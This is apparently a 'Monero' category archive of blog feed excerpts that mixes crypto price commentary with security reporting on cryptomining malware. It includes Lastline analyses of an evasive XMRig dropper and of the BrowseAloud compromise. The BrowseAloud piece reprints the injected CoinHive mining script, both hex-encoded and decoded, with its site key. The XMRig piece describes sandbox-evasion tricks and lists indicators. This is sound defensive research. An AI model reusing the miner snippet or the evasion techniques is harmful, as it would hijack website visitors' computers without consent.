Category Archives: Monero

Monero Price Analysis: Wider Adoption Seen as Bity Adds XMR Support to Their ATM Network

Swiss-based cryptocurrency organization, Bity, has added their support for XMR for use at ATM terminals. XMR/USD trading up on Friday, with gains of over 3% at the time of writing. Despite this, weekly chart view still points to the downside. XMR/USD is trading in positive territory on Friday, having gained over 3% during the session. […]

The post Monero Price Analysis: Wider Adoption Seen as Bity Adds XMR Support to Their ATM Network appeared first on Hacked: Hacking Finance.

Crypto Update: New Lows in Sight Again as Slide Continues

The cryptocurrency segment continues to be under heavy selling pressure following the weekend rally attempt, and although all of the majors are still above last week’s lows, the strong short-term downtrend remains dominant. The long-term picture is overwhelmingly bearish as well, and there are coins showing meaningful relative strength, so sellers are clearly still clearly […]

The post Crypto Update: New Lows in Sight Again as Slide Continues appeared first on Hacked: Hacking Finance.

Crypto Update: Weekend Bounce Fails to Turn Bearish Tide

The major cryptocurrencies continue to be stuck in declining trends, despite the bounce that followed the latest technical breakdown in the segment. The top coins failed to recover above the prior bear market lows sustainably, and today, the market turned lower again, with the weakest currencies already threatening with new lows. The long-term picture remains […]

The post Crypto Update: Weekend Bounce Fails to Turn Bearish Tide appeared first on Hacked: Hacking Finance.

Crypto Update: Sell-Off Deepens as Majors Break Key Levels

The past 24 hours saw another crucial bearish move in the cryptocurrency segment, with the majority of the top coins violating their prior bear market lows and starting another leg lower in the damaging downtrend. Even the relatively stronger coins turned bearish in our trend model with regards to the short-term time-frame while staying bearish […]

The post Crypto Update: Sell-Off Deepens as Majors Break Key Levels appeared first on Hacked: Hacking Finance.

415,000 routers infected by cryptomining malware – Prime target MikroTik

By Waqas

According to a new report, around 415,000 routers throughout the world are infected with malware having the potential to steal computer resources and discreetly mine for the cryptocurrency. The campaign is an active one and it primarily targets MikroTik routers. Researchers claim that the cryptojacking attacks started in August and in the first string of […]

This is a post from HackRead.com Read the original post: 415,000 routers infected by cryptomining malware – Prime target MikroTik

Crypto Update: Altcoins Remain Under Pressure as Bitcoin Holds Support

The cryptocurrency segment continues to trade with a bearish bias, with almost all majors challenging their bear market lows in the past 24 hours. While a broad breakdown has been avoided so far, in the case of the top coins, there is still no sign of meaningful bullish momentum or a developing leadership, so odds […]

The post Crypto Update: Altcoins Remain Under Pressure as Bitcoin Holds Support appeared first on Hacked: Hacking Finance.

KingMiner Maxes Out Windows Server CPUs in Widespread Cryptomining Campaign

Researchers spotted a new cryptomining threat conducting brute-force attacks using 100 percent of Internet Information Services IIS/Structured Query Language (SQL) Microsoft Windows servers’ compute resources.

The malware, called KingMiner, is designed not to steal information but to harvest cryptocurrencies such as Monero, which require considerable processing power to crunch through the mathematical calculations behind them, according to researchers at Check Point.

KingMiner was first discovered this past June, but it has since spawned a new variant with even stronger cryptomining features that is now active in the wild.

Cryptomining Campaign Drains CPUs

Once it identifies its target, KingMiner attempts to guess the system’s password, then downloads and executes a Windows scriptlet file. In some cases, the malware is already active on the system, in which case the new version kills off its predecessor. Israel, Norway, Mexico and India are among the locations where the cryptomining campaign has successfully infected Windows machines, according to the researchers.

KingMiner uses a file called XMRig to mine Monero. Although it was designed to use up only 75 percent of a victim’s machine, in practice, it drains the entire capacity of the central processing unit (CPU) due to coding errors.

The cybercriminals behind KingMiner also take pains to avoid detection. By avoiding any public mining pools with its cryptocurrency wallet and turning off the application programming interface (API), for instance, it’s difficult to know how much Monero it has harvested so far. Emulation attempts, meanwhile, are bypassed through an XML file that has been disguised as a ZIP file within the payload. Additional evasion techniques include exporting functions and adding content to the executable’s dynamic link library (DLL) files.

How to Keep Cryptomining Malware at Bay

The researchers noted that KingMiner is likely to continue its evolution based on placeholders they found in the code for future updates and versions.

Cybercriminals are increasingly interested in mining cryptocurrency it requires less social engineering and malware can run quietly in the background. Eliminating threats such as KingMiner depends on widespread adoption of security information and event management (SIEM) technology and improved network endpoint protection.

Source: Check Point

The post KingMiner Maxes Out Windows Server CPUs in Widespread Cryptomining Campaign appeared first on Security Intelligence.

Crypto Update: Weakening Bearish Momentum Leads to Another Rally Attempt

The cryptocurrency segment is having its most bullish day in a long while, as despite the failed rally attempt on Monday, the top coins held up above their lows and launched another bounce. While that didn’t change the overwhelmingly bearish overall picture, it confirmed the weakening of the negative momentum, at least in the case […]

The post Crypto Update: Weakening Bearish Momentum Leads to Another Rally Attempt appeared first on Hacked: Hacking Finance.

Trade Recommendation: Monero

Monero (XMR/BTC) came off lows of 0.0131 on August 18, 2018. At that point, the market showed signs of bear exhaustion. It was oversold on the daily RSI. In addition, bears failed to flip 0.014 support into resistance as bulls fought back to reject lower prices. With these conditions, it appeared that the short-term bottom […]

The post Trade Recommendation: Monero appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Bounce Back but Bear Trap Not Yet Confirmed

The cryptocurrency segment is finally showing early signs of strength following the weekend’s selloff that took most of the majors to new bear market lows. Compared to the steep declines of the past couple of weeks, the bearish momentum has been relatively weak, and some of the top coins managed to climb back to, or […]

The post Crypto Update: Coins Bounce Back but Bear Trap Not Yet Confirmed appeared first on Hacked: Hacking Finance.

Experts found a new powerful modular Linux cryptominer

Security experts from Russian antivirus firm Dr.Web have discovered a new strain of Linux cryptominer tracked as Linux.BtcMine.174.

The Linux cryptominer has a multicomponent structure that implements a broad range of features in over 1,000 lines of code.

When the Monero Linux cryptominer is first executed it checks whether the server, from which the Trojan will subsequently download additional modules, is available.

Then it finds a folder on disk to which it has write permissions so it can copy itself and use it as a repository for the downloading of additional modules.

The Linux.BtcMine.174 Linux cryptominer uses one of two privilege escalation exploits CVE-2016-5195 (aka Dirty COW) and CVE-2013-2094 to get root permissions on the infected system.

The Linux miner also adds itself as an autorun entry to files like /etc/rc.local/etc/rc.d/…, and /etc/cron.hourly; and then downloads and runs a rootkit.

“If the script is not run with /sbin/init, the following actions are performed:

  1. The script is moved to a previously selected folder with write permissions (rwx) that is named diskmanagerd (the name is specified in the $WatchDogName variable).
  2. The script tries to restart using nohup or just in the background if nohup is not installed (in this case, the Trojan installs the coreutils package). ” Reads the analysis published by Dr. Web.

Once the malware has infected the Linux system, it will scan and terminate the processes of several miners, it scans /proc/${pid}/exe and /proc/${pid}/cmdline to check for specific lines (cryptonight, stratum+tcp, etc.). Experts also discovered that the Trojan also kill antivirus software, including Avast, AVG, Dr.Web and ESET.

Then the Linux.BtcMine.174. downloads and starts its own Monero-mining operation.

Linux.BtcMine.174 also downloads and executes with the ability to steal user-entered passwords for the su command and to hide files in the file system, network connections, and running processes.

The Trojan also collects data for all the hosts to which the current user has previously connected via SSH and tries to connect them.

Experts believe the malware is spreading using SSH credentials stolen on the infected systems.

Additional technical details are included in the report published by Dr.Web, the experts also published SHA1 hashes for the various components of the malware on GitHub.

Pierluigi Paganini

(Security Affairs – Linux cryptominer, Linux.BtcMine.174)

The post Experts found a new powerful modular Linux cryptominer appeared first on Security Affairs.

Crypto Update: Another Steep Selloff Drags Majors to New Lows

The cryptocurrency segment got hit had yet again this weekend, as the mid-week bounce faded and the recent panic lows failed to hold up the top coins. The negative long-term market forces took hold of the segment again, and despite the deeply oversold momentum readings, the majors plunged to new lows. Bitcoin briefly violated the […]

The post Crypto Update: Another Steep Selloff Drags Majors to New Lows appeared first on Hacked: Hacking Finance.

L0rdix malware on dark web steals data, mines crypto & enslaves PCs as botnet

By Waqas

There’s a new hacking tool circulating in the underground Dark Web forums that let cybercriminals target Microsoft Windows computers. It has become the newest universal go-to tool to attack a Windows machine because it presents an utterly lethal combination of data stealing, cryptomining, and snooping capabilities. Discovered by Ben Hunter, a security researcher at ENSILO, […]

This is a post from HackRead.com Read the original post: L0rdix malware on dark web steals data, mines crypto & enslaves PCs as botnet

Crypto Update: Majors Test Lows After Consolidation

After a brief quiet period in the cryptocurrency segment, the top coins turned lower again in the second half of the day and approached their recent bear market lows. While Bitcoin only tested its panic low, Ethereum dipped below at and the still relatively strong Ripple also fell below the key long-term support zone that […]

The post Crypto Update: Majors Test Lows After Consolidation appeared first on Hacked: Hacking Finance.

Crypto Update: New Bear Market Lows Across the Board

The key long-term breakdown in the cryptocurrency segment that we observed last week continued in earnest today, with most of the majors hitting new bear market lows amid another wave of heavy selling. Bitcoin dropped below $5200 for the first time since last October, Ethereum violated the key $160 level, Litecoin plunged below $38, with […]

The post Crypto Update: New Bear Market Lows Across the Board appeared first on Hacked: Hacking Finance.

Long-Term Cryptocurrency Analysis: Bear Market Continues With Major Technical Breakdown

After months of choppy consolidation, yesterday, we saw the largest move in the cryptocurrency segment since April, which took the majors below key technical levels. Bitcoin’s drop is the most important event, since the most valuable coin violated a structurally important base support for the first time since its historic bull run to $20,000 started. […]

The post Long-Term Cryptocurrency Analysis: Bear Market Continues With Major Technical Breakdown appeared first on Hacked: Hacking Finance.

Headmaster caught mining cryptocurrency at school; gets fired

By Uzair Amir

A Chinese school headmaster Lei Hua was caught mining cryptocurrency using the school’s electricity. As a result, he had to lose his job. It happened at Puman Middle School in Hunan province of China. Initially, teachers complained about the loud noise that continued day and night while an increase in the school’s electricity consumption was also reported […]

This is a post from HackRead.com Read the original post: Headmaster caught mining cryptocurrency at school; gets fired

Fake Flash updates upgrade software, but install crypto-mining malware

According to cybersecurity firm Palo Alto Networks, it discovered a fake Flash updater that has been duping conscientious computer users since August. The fake updater installs files to sneak a cryptocurrency mining bot called XMRig, which mines for Monero.

But here's the catch, while the fake updater is installing the XMRig malware, it's also updating the user's Flash.

Via: The Next Web

Source: Palo Alto Networks

Evasive Monero Miners: Deserting the Sandbox for Profit

Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani

Introduction

It’s not news that the cryptocurrency industry is on the rise. Mining crypto coins offers to anybody a lucrative way to exchange computation resources for profit: every time a miner guesses the solution of a complex mathematical puzzle, he is awarded with a newly minted crypto coin. While some cryptocurrencies are based on puzzles that are efficiently solved by special-purpose devices (such as Bitcoin on ASICs), others are still mined successfully on commodity hardware.

One, in particular, is the Monero (XMR) cryptocurrency. Besides being efficiently mined on standard CPUs and GPUs, it is also anonymous, or fungible to use the precise Monero term. This means that while it is easy to trace transactions between several Bitcoin wallets, a complex system relying on ring signatures ensures that Monero transactions are difficult if not impossible to trace, effectively hiding the origin of a transaction. Because of this, it should come as no surprise that the Monero cryptocurrency is also used for nefarious purposes, often mined by rogue javascripts or binaries downloaded onto and running on an unsuspecting user’s system.

Recent statistics show that 5% of all Monero coins are mined by malware. While the security industry is responding to this cryptojacking phenomenon by introducing new improved detection techniques, developers of these binaries began to replicate the modus operandi of ransomware samples: they started embedding anti-analysis techniques to evade detection as long as possible. In this blog article, we highlight some of our findings when analyzing a variant of the XMRig miner, and share insights about some evasion tricks used to bypass dynamic analysis systems.

Dropper

The sample (sha1: d86c1606094bc9362410a1076e29ac68ae98f972) is an obfuscated .Net application that uses a simple crypter to load an embedded executable at runtime using the Assembly.Load method. The following XOR key is used for its decryption:

50 F5 96 DF F0 61 77 42 39 43 FE 30 81 95 6F AF

Execution is later transferred via the EntryPoint.Invoke method to its entry point, after which another binary resource is decrypted. Figure 1 shows the encryption (AES-256) and the key derivation (PBKDF2) algorithms used to decrypt the binary.

Figure 1. AES decryption routine of the embedded file; note the PBKDF2 key

Figure 1. AES decryption routine of the embedded file; note the PBKDF2 key derivation.

The decrypted data consists of yet another executable. We can see it in Figure 2 surrounded by some strings already giving away some of the functionalities included (in particular, note the CheckSandbox and CheckVM strings, most likely indicating routines used to detect whether the sample is run inside an analysis environment).

Figure 2. Decrypted binary blob with an embedded executable file.

Figure 2. Decrypted binary blob with an embedded executable file.

As the reader can imagine, we are always interested in discovering novel evasion techniques. With piqued curiosity, we decided to dive into the code a bit further.

Payload

After peeling off all encryption layers, we finally reached the unpacked payload (see Figure 3). As expected, we found quite a number of anti-analysis techniques.

Figure 3. The unpacked payload

Figure 3. The unpacked payload (sha1: 43f84e789710b06b2ab49b47577caf9d22fd45f8) as found in VT.

The most classic trick (shown in Figure 4) merely checked for known anti-analysis processes. For example, Process Explorer, Process Monitor, etc., are all tools used to better understand which processes are running, how they are spawned, and how much CPU resources are consumed by each executing thread. This is a pretty standard technique to hide from such monitoring tools, and it has been used by other crypto miners as well. As we will see, others were a bit more exotic.

Figure 4. Detecting known process monitoring tools

Figure 4. Detecting known process monitoring tools via GetWindowTextW.

Evasion Technique – Lack of User Input

This technique specifically targets dynamic analysis systems. It tries to detect whether it is executing on a real host by measuring the amount of input received by the operating system. Admittedly, this is not that rare, and we indeed covered it before in a previous article describing some evasion techniques as used by ransomware.

Figure 5. Detecting sandbox by checking the last user input

Figure 5. Detecting sandbox by checking the last user input via GetLastInputInfo.

Figure 5 shows the logic in more details: the code measures the time interval between two subsequent inputs. Anything longer than one minute is considered an indicator that the binary is running inside a sandbox. Note that besides being prone to false positives, this technique can easily be circumvented simulating random user interactions.

Evasion Technique – Multicast IcmpSendEcho

The second anti-analysis technique that we investigated delays the execution via the IcmpCreateFile and IcmpSendEcho APIs. As it is further detailed in Figure 6, they are used to ping a reserved multicast address (224.0.0.0) with a timeout of 30 seconds. Ideally, as no answer is meant to be returned (interestingly enough we have knowledge of some devices erroneously replying to those ICMP packets), the IcmpSendEcho API has the side effect of pausing the executing thread for 30 seconds.

Figure 6. Delaying the execution via IcmpSendEcho API.

Figure 6. Delaying the execution via IcmpSendEcho API.

It’s worth noticing that a similar trick has been previously used by some infected CCleaner samples. In that case, the malicious shellcode was even going a step further by checking if the timeout parameter was being patched in an attempt to accelerate execution (and thus counter the anti-analysis technique).

Conclusions

Any dynamic analysis system wishing to cope with advanced evasive malware must be able to unpack layers of encryption and counter basic anti-analysis techniques. In Figure 7 we can see all the behaviors extracted when fully executing the original sample: the final payload is recognized as a variant of the XMRig Monero CPU Miner, and its network traffic correctly picked up and marked as suspicious.

Figure 7. Lastline analysis of the XMRig CPU miner.

Figure 7. Lastline analysis of the XMRig CPU miner.

Nevertheless it is quite worrying that anti-analysis techniques are becoming this mainstream. So much so that they started to turn into a standard feature of potentially unwanted applications (PUA) as well, including crypto-miners. Hopefully, it is just an isolated case, and not the first of a long series of techniques borrowed from the ransomware world.

Appendix – IOCs

Attached below the reader can find all the hashes related to this analysis, including the mutex identifying this specific strain, and the XMR wallet.

Sha1 (sample): d86c1606094bc9362410a1076e29ac68ae98f972
Sha1 (payload): 43f84e789710b06b2ab49b47577caf9d22fd45f8
Mutex: htTwkXKgtSjskOUmArFBjXWwLccQgxGT
Wallet: 49ptuU9Ktvr6rBkdmrsxdwiSR5WpViAkCXSzcAYWNmXcSZRv37GjwMBNzR7sZE3qBDTnwF9LZNKA8Er2JBiGcKjS6sPaYxY

The post Evasive Monero Miners: Deserting the Sandbox for Profit appeared first on Lastline.

Trust Me, I am a Screen Reader, not a CryptoMiner

Until late Sunday afternoon, a number of public sector websites including ICO, NHS, and local councils (for example, Camden in London) have been serving a crypto miner unbeknownst to visitors, turning them into a free computing cloud at the service of unknown hackers. Although initially only UK sites were particularly affected, subsequent reports included Ireland and US websites as well.

BrowseAloud

Figure 1: BrowseAloud accessibility tool.

While initially researchers considered the possibility of a new vulnerability exploited at large, Scott Helme (https://twitter.com/Scott_Helme/status/962691297239846914) quickly identified the culprit in a foreign JavaScript fragment added to the BrowseAloud (see Figure 1) JavaScript file (https://wwwbrowsealoud[.]com/plus/scripts/ba.js), an accessibility tool used by all the affected websites:

\x3c\x73\x63\x72\x69\x70\x74\x3e 
\x69\x66 \x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72
\x65\x6e\x63\x79 \x3e \x31\x29\x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d 
\x7b\x74\x68\x72\x65\x61\x64\x73\x3a 
\x4d\x61\x74\x68\x2e\x72\x6f\x75\x6e\x64\x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x
61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63\x79\x2f\x33\x29\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a
\x30\x2e\x36\x7d\x7d \x65\x6c\x73\x65 \x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d 
\x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x38\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d 
\x76\x61\x72 \x6d\x69\x6e\x65\x72 \x3d \x6e\x65\x77 
\x43\x6f\x69\x6e\x48\x69\x76\x65\x2e\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x28\'\x31\x47\x64\x51\x47\x70\x59
\x31\x70\x69\x76\x72\x47\x6c\x56\x48\x53\x70\x35\x50\x32\x49\x49\x72\x39\x63\x79\x54\x7a\x7a\x58\x71\'\x2c 
\x63\x70\x75\x43\x6f\x6e\x66\x69\x67\x29\x3b\x6d\x69\x6e\x65\x72\x2e\x73\x74\x61\x72\x74\x28\x29\x3b\x3c
\x2f\x73\x63\x72\x69\x70\x74\x3e

Compromising a third-party tool JavaScript is no small feat, and it allowed deployment of the code fragment on thousands of unaware websites (here a comprehensive list of websites using BrowseAloud to provide screen reader support and text translation services: https://publicwww.com/websites/browsealoud.com%2Fplus%2Fscripts%2Fba.js/).

To analyze the obfuscated code we loaded one of the affected websites (Camden Council) into our instrumented web browser (Figure 2) and extracted the clear text.

Figure 2: the web site Camden Council as analyzed by Lastline instrumented web browser.

As it turns out, it is an instance of the well-known and infamous CoinHive, mining the Monero cryptocurrency:

<script> if (navigator.hardwareConcurrency > 1){ var cpuConfig = {threads: 
Math.round(navigator.hardwareConcurrency/3),throttle:0.6}} else { var cpuConfig = 
{threads: 8,throttle:0.6}} var miner = new 
CoinHive.Anonymous('1GdQGpY1pivrGlVHSp5P2IIr9cyTzzXq', 
cpuConfig);miner.start();</script>

Unlike Bitcoin wallet addresses, CoinHive site keys do not allow balance checks, making impossible to answer the question of how much money the attackers managed to make in this heist. On the other hand, quite interestingly, the very same CoinHive key did pop up on Twitter approximately one week ago (https://twitter.com/Banbreach/status/960594618499858432); context on this is still not clear, and we will update the blog post as we know more.

As of now (16:34) the company behind BrowseAloud, Texthelp, removed the JavaScript from their servers (as a preventive measure the browsealoud[.]com domain has also been set to resolve to NXDOMAIN) effectively putting a stop to this emergency by disabling the BrowseAloud tool altogether. But when did it start, and most importantly how did it happen?

Figure 3: S3 object metadata.

Marco Cova one of our senior researchers here at Lastline, quickly noticed that the BrowseAloud JavaScript files were hosted on an S3 bucket (see Figure 3 above).

In particular the last modified time of the ba.js resource showed 2018-02-11T11:14:24 making this Sunday morning UK time the very first moment this specific version of the JavaScript had been served.

Figure 4: S3 object permissions.

Although it’s not possible to know for certain (only our colleagues at Texthelp can perform this investigation) it seems possible that attackers may have managed to modify the object referencing the JavaScript file by taking advantage of weak S3 permissions (see Figure 4). Unfortunately we cannot pinpoint the exact cause as we do not have at our disposal all permissions records for the referenced S3 bucket.

Considering the number of components involved in a website on average, it might be concerning to see that a single compromise managed to affect so many websites. As Scott Helme noticed however, we should be aware that technologies able to thwart this kind of attacks exist already: in particular, if those websites had implemented CSP (Content Security Policy) to mandate the use of SRI (Subresource Integrity), any attempt to load a compromised JavaScript would have failed, sparing thousands of users the irony of mining cryptocurrency for unknown hackers, while looking to pay their council tax.

The post Trust Me, I am a Screen Reader, not a CryptoMiner appeared first on Lastline.